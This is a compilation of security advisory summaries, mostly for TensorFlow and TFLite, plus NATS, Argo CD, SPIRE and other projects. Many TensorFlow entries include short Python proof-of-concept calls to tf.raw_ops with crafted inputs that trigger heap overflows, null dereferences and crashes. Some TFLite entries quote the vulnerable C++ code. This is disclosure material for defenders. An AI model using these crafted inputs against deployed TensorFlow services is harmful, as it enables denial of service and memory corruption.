An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams:

import tensorflow as tf

data = tf.constant([''] * 11, shape=[11], dtype=tf.string)
splits = [0] * 115
splits.append(3)
data_splits = tf.constant(splits, shape=[116], dtype=tf.int64)
tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss',
                        ngram_widths=[7, 6, 11], left_pad='ABCDE',
                        right_pad=b'ZYXWVU', pad_width=50,
                        preserve_short_sequences=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows:

import tensorflow as tf

indices = tf.constant([], shape=[0, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
dense_shape = tf.constant([], shape=[0], dtype=tf.int64)
default_value = 0
tf.raw_ops.SparseFillEmptyRows(
    indices=indices, values=values, dense_shape=dense_shape,
    default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance:

import tensorflow as tf

hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64)
hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32)
hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64)
truth_values = tf.constant([], shape=[0], dtype=tf.float32)
truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64)
tf.raw_ops.EditDistance(
    hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values,
    hypothesis_shape=hypothesis_shape, truth_indices=truth_indices,
    truth_values=truth_values, truth_shape=truth_shape, normalize=True)
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt)

Problem Description: The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …
The implementation of tf.raw_ops.DrawBoundingBoxesV2 can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs:

import tensorflow as tf

images = tf.fill([10, 96, 0, 1], 0.)
boxes = tf.fill([10, 53, 0], 0.)
colors = tf.fill([0, 1], 0.)
tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data:

import tensorflow as tf

indices = tf.constant([], shape=[10, 0], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
shape = tf.constant([0, 0], shape=[2], dtype=tf.int64)
dense = tf.constant([], shape=[0], dtype=tf.int64)
tf.raw_ops.SparseDenseCwiseMul(
    sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky:

import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops

indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
    st.indices, st.values, st.dense_shape)
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)
tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for the axis argument:

import tensorflow as tf

input_tensor = tf.constant([0.0], shape=[1], dtype=float)
input_min = tf.constant(-10.0)
input_max = tf.constant(-10.0)
tf.raw_ops.QuantizeAndDequantizeV2(
    input=input_tensor, input_min=input_min, input_max=input_max,
    signed_input=False, num_bits=1, range_given=False,
    round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes:

import tensorflow as tf

tf.io.decode_raw(tf.constant(["1", "2", "3", "4"]), tf.uint16, fixed_length=4)
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue:

int TfLiteIntArrayGetSizeInBytes(int size) {
  static TfLiteIntArray dummy;
  return sizeof(dummy) + sizeof(dummy.data[0]) * size;
}

An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in an invalid value being given to malloc:

TfLiteIntArray* TfLiteIntArrayCreate(int size) {
  TfLiteIntArray* ret = …
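To make the overflow arithmetic concrete, here is a small, purely illustrative Python sketch (this is not TFLite code; the 8-byte header size and the element count are assumptions chosen only so that the 32-bit result goes negative):

header_bytes = 8                  # assumed sizeof(TfLiteIntArray) header, for illustration only
size = 0x30000000                 # hypothetical element count taken from a crafted model
exact = header_bytes + 4 * size   # what the C expression computes mathematically (sizeof(int) == 4)
wrapped = exact - 2**32 if exact >= 2**31 else exact   # the same value seen as a two's-complement int
print(exact, wrapped)             # wrapped is negative; that is the value handed to malloc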
The TFLite implementation of concatenation is vulnerable to an integer overflow issue:

for (int d = 0; d < t0->dims->size; ++d) {
  if (d == axis) {
    sum_axis += t->dims->data[axis];
  } else {
    TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]);
  }
}

An attacker can craft a model such that the dimensions of one of the concatenation inputs overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
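For the concatenation case, a similar hedged sketch shows how summing the sizes along the concatenation axis can wrap a 32-bit int (the two dimension values are hypothetical, chosen only to force the overflow):

axis_dims = [0x7FFFFFFF, 2]       # hypothetical dims->data[axis] values of two inputs in a crafted model
sum_axis = sum(axis_dims)         # what the quoted loop accumulates
as_int32 = sum_axis - 2**32 if sum_axis >= 2**31 else sum_axis
print(sum_axis, as_int32)         # the 32-bit view of sum_axis is negative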
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt)

Problem Description: NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …
A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1) allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap:

import tensorflow as tf

inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)
labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)
labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)
sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)
tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
                   labels_values=labels_values, sequence_length=sequence_length,
                   preprocess_collapse_repeated=True, ctc_merge_repeated=False,
                   ignore_longer_outputs_than_inputs=True)

An attacker can also trigger a heap buffer overflow:

import tensorflow as tf

inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure:

import tensorflow as tf

input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)
tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseAdd allows attackers to trigger undefined behavior (dereferencing null pointers) as well as to write outside the bounds of heap allocated data:

import tensorflow as tf

a_indices = tf.zeros([10, 97], dtype=tf.int64)
a_values = tf.zeros([10], dtype=tf.int64)
a_shape = tf.zeros([0], dtype=tf.int64)
b_indices = tf.zeros([0, 0], dtype=tf.int64)
b_values = tf.zeros([0], dtype=tf.int64)
b_shape = tf.zeros([0], dtype=tf.int64)
thresh = 0
tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape,
                     b_indices=b_indices, b_values=b_values, b_shape=b_shape,
                     thresh=thresh)
Lotus is an implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses the blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized" and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in github.com/cilium/cilium.
The package github.com/argoproj/argo-cd/cmd before 1.7.13, and from 1.8.0 before 1.8.6, is vulnerable to Cross-site Scripting (XSS): to exploit it, the SSO provider connected to Argo CD would have to send back a malicious error message containing JavaScript to the user.
Apache Camel's JMX is vulnerable to a rebind flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, and 3.0.0 up to 3.1.0 are affected. Users should upgrade to 3.2.0.
Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …
When reading a file, libwebp allocates an excessive amount of memory. The highest threat from this vulnerability is to the service availability.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passed as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method requires the rank to be 1 and triggers a CHECK failure otherwise. The fix will be …
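A minimal sketch of how such a CHECK failure could be reached, based only on the description above (the concrete shapes are hypothetical; on a vulnerable build this call is expected to abort the process rather than raise a Python error):

import tensorflow as tf

gradients = tf.constant([1.0], shape=[1], dtype=tf.float32)
input = tf.constant([1.0], shape=[1], dtype=tf.float32)
# Rank-2 min/max tensors violate the rank-1 assumption made by the vec<T> accessor.
input_min = tf.constant([[-1.0]], shape=[1, 1], dtype=tf.float32)
input_max = tf.constant([[1.0]], shape=[1, 1], dtype=tf.float32)
tf.raw_ops.QuantizeAndDequantizeV4Grad(
    gradients=gradients, input=input, input_min=input_min, input_max=input_max, axis=0)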
In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt)

Problem Description: The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
Impact: If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer service, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt)

Problem Description: An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …
Impact: When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow:

import tensorflow as tf

tf.raw_ops.RaggedBincount(splits=[7, 8], values=[5, 16, 51, 76, 29, 27, 54, 95],
                          size=59, weights=[0, 0, 0, 0, 0, 0, 0, 0],
                          binary_output=False)
The implementation of tf.raw_ops.RequantizationRange can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs:

import tensorflow as tf

input = tf.constant([1], shape=[1], dtype=tf.qint32)
input_max = tf.constant([], dtype=tf.float32)
input_min = tf.constant([], dtype=tf.float32)
tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs:

import tensorflow as tf

input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32)
grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32)
argmax = tf.constant([1], shape=[1], dtype=tf.int64)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
tf.raw_ops.MaxPoolGradWithArgmax(
    input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides,
    padding='SAME', include_batch_in_index=False)
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:

import tensorflow as tf

t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8)
t_min = tf.constant([], shape=[0], dtype=tf.float32)
t_max = tf.constant([], shape=[0], dtype=tf.float32)
m = tf.constant([1], shape=[1], dtype=tf.quint8)
m_min = tf.constant([], shape=[0], dtype=tf.float32)
m_max = tf.constant([], shape=[0], dtype=tf.float32)
v = tf.constant([1], shape=[1], dtype=tf.quint8)
v_min = tf.constant([], shape=[0], dtype=tf.float32)
v_max = tf.constant([], shape=[0], dtype=tf.float32)
…
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax:

TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1);
int j = 0;
for (int i = 0; i < NumDimensions(input); ++i) {
  if (i != axis_value) {
    output_dims->data[j] = SizeOfDimension(input, i);
    ++j;
  }
}

If axis_value is not a value between 0 and NumDimensions(input), then the test i != axis_value holds on every iteration, so …
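A purely illustrative Python re-enactment of that loop (the 4-D input and the out-of-range axis_value are hypothetical) shows that every iteration writes, so the last index used is one past the end of the (NumDimensions(input) - 1)-element allocation:

num_dims = 4                   # hypothetical NumDimensions(input)
axis_value = 10                # outside the valid range [0, num_dims)
output_len = num_dims - 1      # size passed to TfLiteIntArrayCreate
written = []
j = 0
for i in range(num_dims):
    if i != axis_value:        # always true when axis_value is out of range
        written.append(j)      # index written into output_dims->data
        j += 1
print(written, output_len)     # written == [0, 1, 2, 3], but only indices 0..2 are valid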
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if either of the two input tensor arguments is empty.
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V:

const int input_size = SizeOfDimension(input, axis_value);

If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array:

inline int SizeOfDimension(const TfLiteTensor* t, int dim) {
  return t->dims->data[dim];
}
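A tiny Python analogue of t->dims->data[dim] (illustrative only; the shape and axis value are hypothetical) makes the out-of-range access visible; Python raises IndexError where the C++ code silently reads past the end of the shape array:

dims = [2, 3, 4]               # hypothetical tensor shape array (dims->data)
axis_value = 7                 # not between 0 and NumDimensions(input)
try:
    print(dims[axis_value])
except IndexError:
    print("index 7 is outside the 3-element shape array")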
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data:

import tensorflow as tf

input_tensor = tf.constant(
    [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,
     -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,
     -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3:

import tensorflow as tf

tf.raw_ops.QuantizeAndDequantizeV3(
    input=[2.5, 2.5], input_min=[0, 0], input_max=[1, 1], num_bits=[30],
    signed_input=False, range_given=False, narrow_range=False, axis=3)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can trigger undefined behavior if input arguments are empty:

import tensorflow as tf

shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
default_value = tf.constant(404, dtype=tf.int64)
row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64)
rows = [row]
types = ['ROW_SPLITS']
tf.raw_ops.RaggedTensorToTensor(
    shape=shape, values=values, default_value=default_value,
    row_partition_tensors=rows, row_partition_types=types)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode:

import tensorflow as tf

input_values = tf.constant([58], shape=[1], dtype=tf.int32)
input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32)
output_encoding = "UTF-8"
tf.raw_ops.UnicodeEncode(
    input_values=input_values, input_splits=input_splits,
    output_encoding=output_encoding)
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput:

import tensorflow as tf

input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)
tf.raw_ops.Dilation2DBackpropInput(
    input=input_tensor, filter=filter, out_backprop=out_backprop,
    strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams:

import tensorflow as tf

separator = b'\x02\x00'
ngram_widths = [7, 6, 11]
left_pad = b'\x7f\x7f\x7f\x7f\x7f'
right_pad = b'\x7f\x7f\x25\x5d\x53\x74'
pad_width = 50
preserve_short_sequences = True
l = ['', '', '', '', '', '', '', '', '', '', '']
data = tf.constant(l, shape=[11], dtype=tf.string)
l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices:

import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops

indices_array = np.array([[0, 0]])
value_array = np.array([0.0], dtype=np.float32)
dense_shape = [0, 0]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
    st.indices, st.values, st.dense_shape)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit:

import tensorflow as tf

shape_dims = tf.constant(0, dtype=tf.int64)
indices = tf.ones([1, 1], dtype=tf.int64)
values = tf.ones([1], dtype=tf.int64)
shape = tf.ones([1], dtype=tf.int64)
tf.raw_ops.SparseSplit(
    split_dim=shape_dims, indices=indices, values=values, shape=shape,
    num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor:

import tensorflow as tf

shape = tf.constant([10, 10], shape=[2], dtype=tf.int64)
values = tf.constant(0, shape=[1], dtype=tf.int64)
default_value = tf.constant(0, dtype=tf.int64)
l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow:

import tensorflow as tf

tf.raw_ops.RaggedBincount(splits=[0], values=[1, 1, 1, 1, 1], size=5,
                          weights=[1, 2, 3, 4], binary_output=False)
An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization:

import tensorflow as tf

images = tf.constant([], shape=[0], dtype=tf.qint32)
size = tf.constant([], shape=[0], dtype=tf.int32)
min = tf.constant([], dtype=tf.float32)
max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max,
                                   align_corners=False, half_pixel_centers=False)
An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization:

import tensorflow as tf

tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min,
                            input_max=input_max)
An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization:

import tensorflow as tf

x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
min_x = tf.constant([], dtype=tf.float32)
max_x = tf.constant([], dtype=tf.float32)
min_y = tf.constant([], dtype=tf.float32)
max_y = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf

orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.MaxPoolGrad(
    orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize,
    strides=strides, padding=padding, explicit_paddings=[])
The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf

values = [0.01] * 11
orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32)
orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
ksize = [1, 1, 1, 1, 1]
strides = [1, 1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.MaxPool3DGradGrad(
    orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …
The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf

orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64)
out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64)
row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
tf.raw_ops.FractionalAvgPoolGrad(
    orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop,
    row_pooling_sequence=row_pooling_sequence,
    col_pooling_sequence=col_pooling_sequence, overlapping=False)
Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …
An attacker can trigger a heap buffer overflow in the Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)
The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)
An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in an off-by-one error when accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …
The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
The implementation of the Split TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, "Not an even split"); const int slice_size = input_size / num_splits; An attacker can craft a model such that num_splits would be 0.
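As a rough illustration, a guard of the following form in the operator's Prepare/Eval step would reject a zero num_splits before the division; this is a minimal sketch that reuses the identifiers from the snippet above and is not necessarily the exact upstream fix.
// Hypothetical guard; `context`, `input_size` and `num_splits` are assumed to be
// the same values used in the snippet above.
TF_LITE_ENSURE(context, num_splits != 0);
TF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, "Not an even split");
const int slice_size = input_size / num_splits;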
The TFLite implementation of hashtable lookup is vulnerable to a division by zero error: const int num_rows = SizeOfDimension(value, 0); const int row_bytes = value->bytes / num_rows; An attacker can craft a model such that the first dimension of value would be 0.
The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.
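A minimal sketch of the caller-side validation the text refers to, assuming the stride values come from the operator's params struct as in other TFLite kernels; the exact field names and placement in the upstream fix may differ.
// Hypothetical checks before invoking the optimized kernel.
TF_LITE_ENSURE(context, params->stride_height != 0);
TF_LITE_ENSURE(context, params->stride_width != 0);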
The implementation of the SVDF TFLite operator is vulnerable to a division by zero error: const int rank = params->rank; … TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); An attacker can craft a model such that params->rank would be 0.
The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.
The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.
